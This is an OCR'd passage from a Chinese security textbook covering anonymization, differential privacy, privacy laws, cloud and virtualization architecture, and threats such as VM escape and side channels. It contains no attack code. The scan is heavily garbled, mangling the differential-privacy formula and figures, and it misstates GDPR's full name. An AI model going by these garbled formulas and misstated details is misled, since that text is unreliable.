* 此 外 ,发 布 数 据 的 唯 数 要 足够 低 。 如 果 是 高 维 数据 , 相 比 于 低 维 数据 来 说 保证 同 
样 的 隐私 强度 是 十 分 困难 的 。 例 如 交易 数据 或 者 位 置 数据 ,可 以 通过 把 多 个 数据 
点 连 成 线 来 标识 出 个 人 。 随 着 数据 维 数 的 增加 ,数据 点 分 布 通常 十 分 稀 玻 , 想 不 
严重 扭曲 数据 达到 k- 匿 名 是 十 分 困难 的 。 后 续 的 研究 主要 是 基于 k- 匿 名 中 的 等 
价 类 概念 ,进一步 增加 对 等 价 类 中 敏感 属性 的 约束 ,实现 降低 隐私 泄露 的 风险 。 


6.3.3 ”差分 隐私 


差分 隐私 (Differential Privacy，DP) 是 一 种 基于 统计 学 的 技术 ,主要 应 用 于 对 一 个 数 
据 集 计 算 统 计量 的 时 候 , 保 护 用户 隐 私 。 其 目的 当 对 数据 进行 统计 查询 计算 时 ,不 能 通过 
多 次 不 同 的 查询 方式 推断 出 数据 集中 是 否 包 含 一 个 特定 个 体 的 数据 。 从 数学 上 说 ,从 数 
据 集中 去 掉 ( 或 替换 ) 任 何 一 个 个 体 的 数据 之 后 得 到 一 个 相 邻 数据 集 , 差 分 隐私 保护 算法 
使 得 对 这 两 个 数据 集 计算 统计 量 得 到 相同 结果 的 概率 几乎 是 一 样 的 。 
DP 的 概念 最 先是 在 2006 年 由 微软 研究 院 的 学 者 Dwork 提出 。 对 于 一 个 给 定 的 数 
据 集 以 及 一 个 算法 A ,DP 性 质 要 求 数据 集中 每 个 元 素 对 于 算法 A 的 输出 结果 的 影响 是 
非常 有 限 的 。 这 样 , 从 算法 的 输出 结果 很 难 识别 数据 集中 个 体 的 信息 。 
定义 6-3( 差 分 隐私 ) : 称 一 个 算法 A 满足 e- 差 分 隐私 (e-DP) ,其 中 ,e>0, 当 且 仅 当 对 
于 任意 的 两 个 只 相差 一 个 元 素 的 数据 集 D 和 D', 有 以 下 条 件 满足 : 
VTCRange(A): PrLA(CD) € T] &e'Pr[ACDD € T] CD 
其 中 ,Range(A) 表示 算法 A 的 所 有 可 能 输出 结果 。 
条 件 (1) 可 以 等 价 描述 为 
Vi € Range(A) : Pr [A(D)=t] x et 


Pr [LAD =] ^ ee 


6.3.4 ”隐私 计算 


随 着 信息 技术 的 快速 发 展 和 个 性 化 服务 的 不 断 演进 ,大 型 互联 网 公司 在 服务 用 户 过 

程 中 积累 了 海量 数据 。 此 外 ,数据 的 频繁 跨 境 、 跨 系统 、 跨 生态 圈 交 互 已 成 为 常态 ,加 剧 了 

隐私 信息 在 不 同 信 息 系统 中 的 有 意 /无 意 留存 ,但 随 之 而 来 的 隐私 信息 保护 短 板 效应 、 隐 
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私 侵犯 追踪 溯源 难 等 问题 越 来 越 严 重 ,致使 现 有 的 隐私 保护 方案 不 能 提供 体系 化 的 保护 。 
李 凤 华 等 人 从 信息 采集 、 存 储 、 处 理 、 发 布 ( 含 交换 ) .销毁 等 全 生命 周期 的 各 个 环节 角度 出 
发 ,提出 了 隐私 计算 理论 及 关键 技术 体系 。 

隐私 计算 是 面向 隐私 信息 全 生命 周期 保护 的 计算 理论 和 方法 ,具体 是 指 在 处 理 视频 、 
音频 、 图 像 、 图 形 、 文 字 、 数 值 , 泛 在 网 络 行为 信息 流 等 信息 时 ,对 所 涉及 的 隐私 信息 进行 描 
述 ,度量 .评价 和 融合 等 操作 ,形成 一 套 符 号 化 .公式 化 且 具 有 量化 评价 标准 的 隐私 计算 理 
ie .算法 及 应 用 技术 ,支持 多 系统 融合 的 隐私 信息 保护 。 

隐私 计算 涵盖 了 信息 所 有 者 、 信 息 转 发 者 、 信 息 接收 者 在 信息 采集 ,存储 、 处 理 、 发 布 
( 含 交 换 )、 销 毁 等 全 生命 周期 过 程 的 所 有 计算 操作 ,是 隐私 信息 的 所 有 权 、 管 理 权 和 使 用 
权 分 离 时 隐私 信息 描述 、 度 量 \ 保 护 ,效果 评估 延伸 控制 .隐私 泄露 收益 损失 比 、 隐 私 分 析 
复杂 性 等 方面 的 可 计算 模型 。 其 核心 内 容 包 括 : 隐私 计算 框架 、 隐 私 计算 形式 化 定义 、 算 
法 设计 准则 、 隐 私 保护 效果 评估 和 隐私 计算 语言 等 内 容 。 


6.3.5 ”隐私 保护 的 法 律 法 规 


为 了 保护 用 户 隐私 ,各 国政 府 和 组 织 都 出 台 了 相关 的 法 律 法 规 。 


1. HIPAA 

HIPAA 是 美国 健康 保险 信息 隐私 保护 的 法 规 , 全 名 为 Health Insurance Portability 
and Accountability Act。 该 法 规 于 1996 年 制定 ,其 目标 是 保护 个 人 医疗 记录 的 隐私 , 适 
用 于 政府 与 私人 保险 机 构 、 医 疗 机 构 与 医护 人 员 、 相 关 企 事业 单位 。 自 发 布 以 来 ,已 经 处 
理 隐 私 保护 投诉 超过 10 万 起 。 其 中 比较 有 影响 的 一 件 投诉 是 2005—2008 年 ,美国 
UCLA 医院 多 名 雇员 偷窥 多 名 明星 的 医疗 档案 ,受害 者 为 “小 甜 甜 " 布 兰 妮 ,汤姆 ，。 克 鲁 
斯 等 明星 。 经 调查 后 的 处 理 结果 是 : UCLA 医院 被 罚 86.5 万 美元 ,一 名 雇员 承认 犯 有 重 
罪 ( 和 人 狱 前 因 病 死亡 )。 后 来 还 发 生 了 一 位 华人 雇员 因 偷 宇 施 瓦 辛 格 等 人 的 医疗 档案 入 狱 
的 案件 。 


2. Regulation P 

Regulation P 是 美国 联邦 储备 银行 订立 的 法 规 , 全 名 是 Privacy of Consumer 
Financial Information ,用 于 保护 金融 行业 用 户 的 隐私 信息 。 该 法 规 规定 : 金融 机 构 必 须 
将 他 们 的 隐私 策略 告知 客户 ;金融 机 构 必 须 为 不 同意 其 隐私 政策 的 用 户 提供 退出 机 制 ;用 
户 有 权 禁 止 金融 机 构 向 第 三 方 透 露 其 金融 信息 ;限制 金融 机 构 使 用 用 户 信息 进行 商业 行 
为 (如 推销 等 ) 。 


3. FACT 

FACT 是 美国 国会 2003 年 对 信用 卡 个 人 隐私 保护 所 立 的 法 案 , 全 名 是 Fair and 
Accurate Credit Transaction Act 2003。 该 法 案 规 定 : 出 现在 收据 上 的 信用 卡 / 借 记 卡 号 
必须 缩写 ,最 多 显示 5 位 ;金融 机 构 必 须 向 被 冒 用 信息 的 个 人 提供 相关 资料 (例如 冒 用 者 
的 征 信和 报告 ) ;金融 机 构 必 须 设立 个 人 信息 防 窃 部 门 ;每 12 个 月 ,金融 机 构 必 须 向 用 户 提 
供 一 份 免 费 的 征 信 报 告 , 用 户 有 权 质疑 其 数据 ;金融 机 构 必 须 妥 善 处 理 用 户 的 征 信 报告 ， 
避免 其 被 无 权限 人 员 获 得 。 
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4. PCI DSS 

PCI DSS 是 美国 支付 行业 的 信息 管理 标准 ,全 名 是 Payment Card Industry Data 
Security Standard。 制 定 者 是 五 大 信用 卡 联盟 (Visa, MasterCard, American Express. 
Discover. JCB) ,该 标准 对 信用 卡 、 借 记 卡 等 银行 卡 的 信息 组 织 、 存 储 、 处 理 \ 传 输 方式 等 
做 出 规范 。2014 年 , 据 国 内 某 信息 安全 平台 称 , 某 旅游 网 站 违反 PCI DSS 规定 ,其 安全 支 
付 日 志 可 以 遍历 下 载 ,导致 大 量 用 户 银行 卡 信息 泄露 ,包括 持 卡 人 姓名 身份 证 .银行 卡号 、 
信用 卡 CVV 码 等 。 

5. GDPR 

GDPR 是 欧盟 关于 隐私 保护 的 法 律 ,全 名 是 General Data Protection Reform。 该 法 
规 第 一 版 于 2016 年 4 月 14 日 被 批准 ,修改 版 于 2018 4E 5 H 25 日 生效 。 目标 是 把 个 人 
信息 的 控制 权 交 还 给 个 人 和 公民 ,简化 国际 商务 的 合 规 环境 。 与 此 前 法 律 相 比 ,GDPR 给 
予 个 人 更 强 的 隐私 保护 ,给 予 信息 技术 企业 和 机 构 更 多 的 限制 。GDPR 明确 规定 ,个 人 有 具 
有 “被 遗忘 "的 权利 ,即便 此 人 以 前 已 经 提供 数据 并 同意 对 该 数据 的 使 用 。 此 项 规定 对 社 
交 网 络 具 有 极 大 影响 ;存储 在 社交 网 络 中 的 内 容 不 再 是 “ 覆 水 难 收 ”"。 在 个 人 信息 遭 到 汇 
露 时 ,受害 者 具有 "被 警告 的 权力 ,以 便 受 害 者 及 时 采取 对 策 。 同 时 ,相关 企业 或 机 构 必 
须 向 政府 监督 部 门 汇报 信息 泄露 的 详细 情况 。 互 联网 企业 无 法 再 用 模糊 语言 来 大 事 化 
小 ,小 事 化 了 。 公 民 隐 私有 "默认 被 保护 "的 权力 ,GDPR 明确 规定 ,所 有 信息 产品 和 服务 
在 默认 状态 下 就 必须 向 用 户 提供 隐私 保护 ,而 且 该 保护 对 用 户 而 言 必须 容易 理解 和 使 用 。 
GDPR 还 规定 ,产品 和 服务 在 设计 的 最 初 阶段 就 必须 考虑 隐私 保护 的 需求 。 以 上 所 述 的 
产品 和 服务 包括 社交 网 络 和 手机 应 用 。GDPR 还 加 强 了 对 隐私 侵犯 行为 的 处 罚 力度 , 罚 
款 最 高 可 达 企 业 年 销售 额 的 4% 。 


6.《 网 络 安全 法 》 

2017 年 6 月 1 日 (中 华人 民 共 和 国 网 络 安 全 法 ) 正 式 生 效 ,其 明确 规定 : 网 络 产 品 、 服 
务 具 有 收集 用 户 信息 功能 的 ,其 提供 者 应 当 向 用 户 明 示 并 取得 同意 ;网 络 运营 者 不 得 泄 
露 . 自 改 .毁损 其 收集 的 个 人 信息 ;任何 个 人 和 组 织 不 得 窃取 或 者 以 其 他 非法 方式 获取 个 
人 信息 ,不 得 非法 出 售 或 者 非法 向 他 人 提供 个 人 信息 。 政 府 已 经 把 个 人 隐私 交易 列 人 严 
打 范 围 。2018 年 5 月 ,顺丰 快递 11 名 员工 因 出 售 用 户 隐 私信 息 而 获 刑 。 该 11 名 员工 于 
2015 一 2016 年 期 间 , 利 用 职务 之 便 ,合伙 出 售 客户 隐私 千 万 余 条 。 


“64 。 云 计算 及 其 安全 


6.4.1 ”什么 是 云 计算 
1. 云 计 算 
云 计算 是 一 种 基于 网 络 访问 和 共享 使 用 的 ,以 按 需 分 配 和 自 服务 置 备 等 方式 对 可 伸 
缩 .弹性 的 共享 物理 和 虚拟 资源 池 等 计算 资源 供应 和 管理 的 模式 。 人 们 只 需要 为 使 用 的 
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云 服 务 付费 。 云 计算 的 优点 是 减少 开销 , 按 需 快速 提供 服务 ,全 球 弹性 伸缩 ,其 效率 和 性 
能 更 高 , 且 更 安全 、 更 可 靠 。 

根据 对 物理 或 虚拟 资源 控制 和 共享 的 方式 ,一 般 将 云 部 署 的 模型 分 为 社区 云 .混合 
云 . 私 有 云 和 公有 云 等 4 种 类 型 。 公 有 云 是 由 第 三 方 服务 提供 商 提 供给 一 般 公众 或 某 个 
大 型 行业 团体 通过 Internet 使 用 的 计算 、 存 储 等 服务 。 由 于 资源 被 云 服 务 提供 者 控制 ,用 
户 需 要 将 数据 传送 到 第 三 方 ,因此 用 户 在 使 用 公有 云 时 通常 会 有 很 多 的 安全 顾虑 。 常 见 
的 国内 公有 云 有 阿里 云 .腾讯 云 .华为 云 等 ,国外 有 Amazon EC2 和 S3、Microsoft Azure 
等 。 私 有 云 是 一 种 只 为 一 个 客户 单独 使 用 而 构建 的 云 服 务 ,其 资源 控制 权 属于 云 服务 客 
户 , 因 此 可 保证 对 数据 .安全 性 和 服务 质量 最 为 有 效 的 控制 ,但 是 成 本 较 高 。 混 合 云 的 基 
础 设施 由 两 个 或 多 个 云 (和 有、 社区 或 公共 ) 组 成 ,以 独立 实体 存在 ,在 安全 性 和 成 本 之 间 
提供 了 一 种 折 中 的 方式 。 而 社区 云 是 一 种 仅 有 一 组 特定 的 云 服 务 客户 使 用 和 共享 的 一 种 
云 部 署 模型 ,其 资源 由 客户 成 员 控制 和 管理 。 

NIST 定义 了 云 计算 的 3 种 服务 模型 ,分 别 为 基础 设施 即 服务 (infrastructure as a 
service. laaS) .平台 即 服务 (platform as a service. PaaS) 和 软件 即 服 务 (software as a 
service,SaaS) 。 云 计算 体系 架构 如 图 6-21 所 示 。 
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图 6-21 云 计算 体系 架构 
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* IaaS 可 以 提供 硬件 基础 设施 部 署 服务 ,通过 引入 虚拟 化 技术 以 提供 硬件 资源 分 配 
的 优化 。CPU 内 存 、 硬 盘存 储 和 网 络 可 以 在 云 计 算 中 心 构成 计算 资源 池 ,通过 虚 
拟 化 控制 软件 给 用 户 提供 其 需要 的 计算 性 能 ,其 可 定制 性 强 .可靠 性 高 .规模 可 扩 
展 。 一 些 常 用 的 虚拟 化 工具 包括 KVM、Xen、VMware 等 。 

。 PaaS fE IaaSs 之 上 ,可 以 向 租户 通过 Internet 交付 应 用 开发 所 需 的 硬件 和 软件 工 
具 。 为 云 计算 应 用 开发 者 开发 和 运行 新 应 用 屏蔽 了 底层 的 存储 .操作 系统 和 网 络 
的 管理 问题 。PaaS 将 现 有 的 操作 系统 .服务 器 .数据 库 . 中 间 件 .网 络 设备 和 存储 
服务 整合 在 一 起 ,这 些 功能 和 组 件 都 由 服务 提供 商 拥有 运行 .配置 和 维护 ,PaaS 
还 提供 额外 的 资源 ,例如 数据 库 管 理 系统 、 编 程 语 言 \ 库 和 各 种 开发 工具 。 许 多 
PaaS 产品 是 面向 软件 开发 的 ,在 提供 计算 和 存储 基础 设施 之 外 ,还 提供 文本 编 
辑 、 版 本 管理 ,编译 和 测试 服务 ,帮助 开发 者 更 快 和 更 有 效 地 开发 新 软件 。PaaS 
还 能 帮助 开发 团队 不 用 考虑 地 理 位 置 协 同 工 作 。PaaS 的 典型 服务 包括 云 应 用 容 
器 ` 云 数据 库 服务 ` 云 文件 存储 内容 分 发 .在 线 文本 /图 像 / 视 频 处 理 ` 云 监控 和 云 
数据 分 析 等 。 

。 SaaS 是 用 户 通过 Internet 访问 软件 应 用 的 一 种 云 服务 模式 。 用 户 可 以 通过 标准 

的 Web 浏览 器 访问 云 服 务 提供 商 提 供 的 软件 应 用 ,而 不 再 需要 在 自己 的 计算 机 
上 安装 软件 。 典 型 的 SaaS 服务 包括 文件 共享 邮件、 日历、 客户 关系 管理 (CRM) 
和 人 力 资源 管理 等 。 

无 服务 器 计算 是 传统 的 云 计 算 平 台 延 伸 , 是 对 特定 PaaS 功能 的 广泛 使 用 ,属于 云 原 
^ECCloud Native) 架 构 ,其 目的 是 让 用 户 能 够 将 更 多 的 运营 职责 转移 到 云 服 务 上 ,从 而 专 
注 于 提高 灵活 性 和 创新 能 力 。 无 服务 器 计算 让 用 户 可 以 在 不 考虑 服务 器 的 情况 下 构建 并 
运行 应 用 程序 和 服务 ,以 消除 基础 设施 管理 任务 ,例如 服务 器 或 集群 配置 ,修补 ,操作 系统 
维护 和 容量 预 置 。 用 户 能 够 为 几乎 任何 类 型 的 应 用 程序 或 后 端 服务 构建 无 服务 器 应 用 程 
序 , 并 且 运 行 和 扩展 具有 高 可 用 性 的 应 用 程序 所 需 的 所 有 操作 都 可 由 用 户 自己 负责 。 


2. 虚拟 化 技术 

虚拟 化 技术 是 云 计算 的 基础 ,其 快速 发 展 主要 得 益 于 硬件 日 益 增长 的 计算 能 力 和 不 
断 降低 的 成 本 。 虚 拟 化 技术 分 为 两 类 : 虚拟 机 和 容器 。 前 者 能 够 实现 在 一 台 物 理 机 上 运 
行 多 台 虚 拟 机 ,在 每 台 虚 拟 机 中 分 别 运 行 不 同 的 操作 系统 和 应 用 程序 ,并且 虚拟 机 之 间 具 
有 和 良好 的 隔离 性 。 后 者 则 消除 了 应 用 对 虚拟 机 中 操作 系统 的 依赖 , 相 比 虚拟 机 技术 ,容器 
技术 虚拟 化 的 是 操作 系统 ,因此 无 须 为 每 个 虚拟 机 平台 安装 完整 的 操作 系统 ,从 而 达到 简 
化 部 署 ,减轻 负载 的 目的 。 

(1) 虚拟 机 

虚拟 机 技术 通过 在 硬件 之 上 增加 一 层 称 为 虚拟 机 监控 器 (Virtual Machine Monitor, 
VMM) 的 软件 层 来 实现 的 。 目 前 广泛 应 用 的 系统 级 虚拟 机 包括 VMWare, Xen, 
Microsoft Hyper-V , VirtualBox, Denali, K VM, QEMU 和 User Mode Linux 等 。 

根据 VMM 所 提供 的 虚拟 平台 类 型 ,可 以 将 虚拟 机 技术 分 为 完全 虚拟 化 和 半 虚 拟 
化 。 在 完全 虚拟 化 的 虚拟 平台 中 ,客户 操作 系统 GuestOS 并 不 知道 自己 是 一 台 虚 拟 机 ， 
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它 会 认为 自己 就 是 运行 在 计算 机 物理 硬件 设备 上 的 主 操作 系统 HostOS。 因 为 完全 虚拟 
化 的 VMM 会 将 一 个 OS 所 能 够 操作 的 CPU .内存 、 外 设 等 物理 设备 逻辑 抽象 成 为 虚拟 
CPU ,虚拟 内 存 .虚拟 外 设 等 虚拟 设备 后 ,再 交 由 GuestOS 来 操作 使 用 。 这 样 的 GuestOS 
会 将 底层 硬件 平台 视 为 自己 所 有 的 ,但 是 实际 上 ,这 些 都 是 VMM 为 GuestOS 制造 的 
假象 。 

完全 虚拟 化 又 分 为 软件 辅助 的 全 虚拟 化 和 硬件 辅助 的 全 虚拟 化 。 

在 Intel 等 CPU 厂商 还 没有 发 布 x86 CPU 虚拟 化 技术 之 前 ,完全 虚拟 化 都 是 通过 软 
件 辅助 的 方式 来 实现 的 。 软 件 辅助 虚拟 化 能 够 成 功 地 将 所 有 在 GuestOS 中 执行 的 系统 
内 核 特 权 指 令 进行 捕获 、 翻 译 , 使 之 成 为 只 能 对 GuestOS 生效 的 虚拟 特权 指令 。 随 后 ， 
Intel 和 AMD 分 别 发 布 了 Intel-VT 和 AMD-V 技术 ,使 CPU 支持 硬件 虚拟 化 。 在 CPU 
可 以 明确 地 分 辨 出 来 自 GuestOS 的 特权 指令 ,并 针对 GuestOS 进行 特权 操作 而 不 会 影 
响 到 HostOS, 从 而 使 硬件 辅助 的 全 虚拟 化 成 为 主流 。 

硬件 辅助 全 虚拟 化 的 VMM 会 以 一 种 更 具 协 作 性 的 方式 来 实现 虚拟 化 一 一 将 虚拟 
化 模块 加 载 到 HostOS 的 内 核 中 ,例如 ,KVM 通过 在 HostOS 内 核 中 加 载 KVM Kernel 
Module 来 将 HostOS 转换 成 为 一 个 V 此 时 VMM 可 以 看 作 HostOS, 反 之 亦 然 。 这 种 虚 
拟 化 方式 创建 的 GuestOS 知道 自己 是 正在 虚拟 化 模式 中 运行 的 GuestOS,KVM 就 是 这 
样 的 一 种 虚拟 化 实现 解决 方案 。 

半 虚 拟 化 通过 在 GuestOS 的 源 代码 级 别 上 修改 特权 指令 来 回避 上 述 的 虚拟 化 漏洞 。 
修改 内 核 后 的 GuestOS 也 知道 自己 就 是 一 台 虚 拟 机 。 所 以 能 够 很 好 地 对 核心 态 指 令 和 
敏感 指令 进行 识别 和 处理, 但 缺点 在 于 GuestOS 的 镜像 文件 并 不 通用 。 

虚拟 化 架构 主要 可 以 分 为 三 类 , 即 寄居 架构 (Hosted Architecture) , HR 4z J8 2 44 
(Bare Metal Architecture) 和 容器 架构 ,如 图 6-22 所 示 。 


| 应 用 程序 ] ”|[ 应 用 程序 | 
应 用 程序 应 用 程序 操作 系统 u 操作 系统 应 用 程序 jur ou 应 用 程序 
操作 系统 »a 操作 系统 Hypervisor 操作 系统 虚拟 化 
Hypervisor 主 操作 系统 主 操作 系统 
服务 器 硬件 los ae (T 服务 器 硬件 
(a) 裸 金属 架构 (b) 寄居 架构 (c) 容器 架构 


图 6-22 虚拟 化 架构 


CD 寄居 架构 : 在 Windows、Linux 等 操作 系统 之 上 安装 和 运行 虚拟 机 ,依赖 主机 操作 
系统 对 设备 的 驱动 和 物理 资源 的 管理 。 通 过 一 个 软件 层 在 现 有 操作 系统 上 实现 硬件 虚拟 
化 。 客 户 机 提供 了 一 个 完整 的 ,独立 的 、 无 依赖 的 客户 机 操作 系统 副本 ,通常 利用 半 虚 拟 
化 驱动 网 络 和 1/O 提高 客户 机 性 能 。 流 行 的 寄居 架构 虚拟 机 包括 Vmware Workstation 
和 VirtualBox 等 。 

Q 裸 金属 架构 : 直接 在 硬件 上 安装 虚拟 化 监控 器 Hypervisor, 然 后 再 在 其 上 安装 操 
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作 系 统 和 应 用 ,依靠 Hypervisor 对 硬件 设备 进行 管理 。 这 里 又 分 为 了 3 个 子 类 型 。 
* 独立 型 ,代表 是 VMware vSphere ,其 架构 如 图 6-23 所 示 。 


传统 操作 系统 ] ( 传统 操作 系统 (传统 操作 系统 传统 操作 系统 


控制 台 | 
Fs gn JL mm — J[ 虚拟 机 虚拟 机 
MGMT API HF] 


类 型 [独立 的 Hypervisor 
(Vmware ESX) 


服务 器 
623 ”独立 型 裸 金属 架构 


所 有 硬件 虚拟 化 和 VMM 功能 由 一 个 高 度 复杂 的 操作 系统 VMKernel 组 成 ,提供 所 
有 虚拟 机 监控 和 硬件 虚拟 化 功能 ,VMware 在 客户 机 内 需要 网 络 和 1/O 驱动 半 虚 拟 化 。 
。 混合 型 ,代表 是 Citrix XenServer,Microsoft Hyper-V ,其 架构 如 图 6-24 所 示 。 


传统 操作 系统 儿 传统 操作 系统 【传统 操作 系统 ) (传统 操作 系统 】 


父 /Dom0 虚拟 机 虚拟 机 | 虚拟 机 虚拟 机 


分 区 


一 -下 


类 型 [独立 的 Hypervisor 


n (VMware ESX) 
| 
U 服务 器 内 存 &CPU 


图 6-24 混合 型 裸 金属 架构 


一 个 “ 瘦 ”Hypervisor 联合 一 个 父 分 区 提供 硬件 虚拟 化 , 它 提供 了 虚拟 机 监视 功能 。 
父 分 区 也 称 为 Dom0 , 它 通常 是 一 个 运行 在 本 地 的 完整 操作 系统 虚拟 机 ,并 具有 根 权限 。 
这 些 虚 拟 机 产品 都 为 客户 机 提供 了 半 虚 拟 化 驱动 ,从 而 提高 网 络 和 1/O 性 能 。 混 合 型 架 
构 起 源 于 Xen 项 目 ,得 益 于 开源 社区 (Xen) 的 贡献 , 它 能 够 很 好 地 适应 半 虚 拟 化 操作 系统 
的 未 来 发 展 。 

。 组 合 型 ,代表 是 基于 Linux 的 内 核 虚拟 机 (KVM) ,其 架构 如 图 6-25 所 示 。 

KVM 不 是 在 裸 机 上 执行 Hypervisor. 其 利用 开源 Linux (包括 RHEL, SUSE. 
Ubuntu 等 ) 作 为 基础 操作 系统 ,提供 一 个 集成 到 内 核 的 模块 KVM 实现 硬件 虚拟 化 ， 
KVM 模块 在 用 户 模 式 下 执行 ,但 可 以 让 虚拟 机 在 内 核 级 权限 使 用 一 个 新 的 指令 执行 上 
下 文 ,被 称 为 客户 机 模式 。KVM 使 用 一 个 经 过 修改 的 开源 QEMU 硬件 仿真 包 提 供 完整 
的 硬件 虚拟 化 ,这 意味 着 客户 机 操作 系统 不 需要 操作 系统 半 虚 拟 化 。KVM 现在 已 经 成 
为 很 多 Linux 发 行 版 的 标准 模块 ,已 经 成 为 一 个 流行 的 Hypervisor。 

(2) 容器 
由 于 在 传统 的 Hypervisor 虚拟 化 技术 中 ,每 个 虚拟 机 都 需要 运行 一 个 完整 的 操作 系 
统 以 及 其 中 包含 的 大 量 应 用 程序 ,由 此 产生 的 沉重 负载 将 会 影响 其 性 能 和 资源 调用 的 效 
率 , 另 一 种 虚拟 化 技术 一 一 容器 的 出 现 , 有 效 地 解决 了 上 述 问 题 。 
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传统 操作 系统 ) ( 传统 操作 系统 】 模拟 存储 和 网 络 IO 
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: Linux 用 户 模式 
nal HN toombsx | 
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6-25 ”组 合 型 裸 金属 架构 


容器 运行 在 操作 系统 之 上 ,创建 一 个 独立 的 虚拟 化 实例 ,指向 底层 的 托管 操作 系统 ， 
也 被 称 为 操作 系统 虚拟 化 。 其 本 质 就 是 一 种 特殊 的 进程 ,通过 指定 进程 所 需要 启用 的 一 
组 Namespace 参数 ,进而 让 该 容器 进程 只 能 看 到 当前 Namespace 所 限定 的 资源 ,文件 \ 设 
备 、. 状 态 或 者 配置 。 容 器 共用 内 核 . 并 提供 额外 的 隔离 的 手段 避免 虚拟 的 操作 系统 占用 。 

在 容器 模型 中 ,虚拟 层 是 通过 创建 虚拟 操作 系统 实例 实现 的 , 它 青 指向 根 操作 系统 的 
关键 系统 文件 ,如 图 6-26 所 示 , 这 些 指 针 驻 留 在 操作 系统 容器 受 保护 的 内 存 中 ,提供 低 内 
存 开 销 , 因 此 虚拟 化 实例 的 密度 很 大 ,密度 是 容器 架构 相对 于 寄居 型 和 裸 金属 型 架构 的 关 
键 优势 之 一 。Docker 就 是 一 个 开源 的 应 用 容器 引擎 。 


虚拟 操作 系统 (容器) 
受 保护 内 存 汇 总 的 虚拟 指针 指向 宿主 操作 系统 -ntdll.dll, ntoskml, exe 等 


拟 
日 


指 
8 带 有 容器 的 主机 操作 系统 | 
(例如 : Parallels virtuozzo/Linux VServer) 
| 服务 器 由 
图 6-26 容器 


相 比 虚拟 机 实例 ,容器 实例 的 创建 速度 要 快 得 多 ,同时 ,容器 实例 运行 环境 的 再 部 署 
无 须 移 植 操作 系统 ,因此 容器 技术 的 灵活 性 大 大 优 于 虚拟 机 技术 。 但 大 多 数 容 器 技术 依 
赖 原生 Linux 的 支持 ,在 Microsoft 环境 中 运行 则 略 显 笨 拙 ,同时 ,容器 应 用 数量 的 增加 
将 会 伴随 复杂 度 的 增长 ,在 实际 生产 环境 中 管理 如 此 多 的 容器 具有 相当 的 难度 。 总 体 而 
言 ,容器 技术 是 一 种 相对 较 新 的 技术 ,需要 时 间 适 应 市 场 。 


6.4. 去 计算 安全 
1. 云 基 础 设施 安全 


基于 云 计算 构建 的 信息 系统 ,底层 基础 设施 由 云 服务 商 提 供 , 而 上 层 的 业务 和 数据 则 
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由 云 租 户 建设 并 维护 。 在 不 同 的 服务 模型 中 , 云 服 务 商 和 云 租 户 的 控制 范围 会 有 些 差别 。 
例如 ,在 SaaS 的 租户 只 能 访问 和 管理 其 使 用 的 应 用 程序 ,PaaS 的 租户 则 要 在 平台 上 开发 
和 部 署 的 应 用 ,而 IaaS 的 服务 商 则 只 提供 信息 基础 设施 ,这 将 导致 包括 安全 责任 在 内 的 
责任 边界 也 会 有 相应 的 区 别 ,但 在 绝 大 多 数 的 场景 下 , 云 计算 服务 提供 商都 至 少 要 参与 到 
云 基础 设施 的 安全 建设 中 ,为 租户 提供 一 个 可 靠 的 信息 系统 运行 环境 。 

云 基础 设施 有 两 大 层面 : 一 是 汇集 在 一 起 用 来 构建 云 的 基础 软 硬 件 资源 ,如 服务 器 、 
网 络 设备 .存储 设备 .虚拟 化 软件 .管理 系统 等 ;二 是 在 laaS 下 由 云 用 户 管理 的 虚拟 /抽象 
基础 设施 ,是 从 资源 池 中 分 配 的 计算 、 网 络 和 存储 资产 。 两 者 的 安全 都 和 其 他 章节 中 介绍 
的 针对 传统 基础 架构 的 安全 技术 有 很 多 共性 ,但 也 有 各 自 独 特 的 地 方 ,如 针对 第 1 层 , 虚 
拟 化 系统 中 存在 的 虚拟 机 逃逸 问题 会 严重 影响 云 计 算 基 础 平台 的 安全 性 ,而 针对 第 2 层 ， 
云 计算 对 资源 的 抽象 化 和 集中 化 管理 ,使 得 虚拟 /抽象 基础 设施 在 业务 连续 性 、 网 络 隔离 
和 系统 安全 方面 都 获得 了 显著 的 增益 。 下 文 分 别 对 这 些 云 基 础 设施 安全 相关 的 内 容 进 行 
介绍 。 

(1) 虚拟 化 带 来 的 安全 威胁 

云 计算 平台 中 ,大 量 分 配给 不 同 租户 的 虚拟 机 运行 在 相同 的 资源 池 中 ,需要 由 虚拟 化 
管理 系统 来 进行 主机 和 网 络 上 的 隔离 ,才能 使 得 各 租户 的 虚拟 信息 资产 相对 独立 ,无 法 相 
互 影 响 。 这 导致 云 平台 上 的 虚拟 机 系统 除了 面临 所 有 传统 主机 系统 可 能 遭受 的 安全 威胁 
以 外 ,还 存在 着 如 下 一 些 特 有 的 安全 问题 。 

CD 虚拟 机 逃逸 。 

虚拟 机 逃逸 指 的 是 突破 虚拟 机 的 限制 ,实现 与 宿主 机 操作 系统 或 虚拟 机 管理 系统 交 
互 的 一 个 过 程 。 虚 拟 机 逃逸 利用 虚拟 机 管理 软件 或 者 虚拟 机 中 运行 的 软件 的 漏洞 进行 攻 
击 , 攻 击 者 可 以 通过 虚拟 机 逃逸 来 控制 虚拟 机 管理 系统 或 者 在 宿主 机 上 和 运行 恶意 软件 , 进 
而 获得 其 他 虚拟 机 的 完全 控制 权限 。 

自 2005 年 至 今 ,包括 VMware、Xen、Hyper-V、VirtualBox 在 内 的 几乎 所 有 主流 虚拟 
机 系统 都 被 发 现 过 逃逸 漏洞 。2009 年 ,一 家 英国 的 Web 托管 公司 Vaserv 就 因 虚 拟 机 管 
理 程序 的 安全 威胁 导致 用 户 数据 的 丢失 ,黑客 利用 HyperVM 2.0.7992( 虚 拟 机 管理 程 
序 ) 版 本 中 的 “0day? 漏 洞 ,成 功 获取 了 宿主 机 上 的 root 权限 ,并 删除 了 10 万 多 个 账户 的 
数据 。 

Q 边 信 道 攻击 。 

边 信道 攻击 是 一 种 特殊 的 攻击 方法 , 它 利 用 在 信息 处 理 过 程 中 (如 加 解密 、 复 杂 计 算 、 
海量 检索 ) 使 用 的 不 同 运 算 操作 或 特定 物理 硬件 而 产生 的 不 同 额外 信息 发 起 攻击 ,通过 捕 
3k ,分 析 这 些 信息 的 变化 达到 获取 信息 系统 中 的 敏感 信息 的 目的 。 这 类 “无 意识 ”的 额外 
输出 信息 (如 时 间 信 息 、 功 率 消耗 ,电磁 泄漏 或 者 声音 等 ) 通 常 被 称 为 边 信 道 信 息 (Side 
Channel Information,SCD ,能 够 被 用 于 边 信道 攻击 的 边 信道 信息 须 满足 如 下 两 个 条 件 ; 
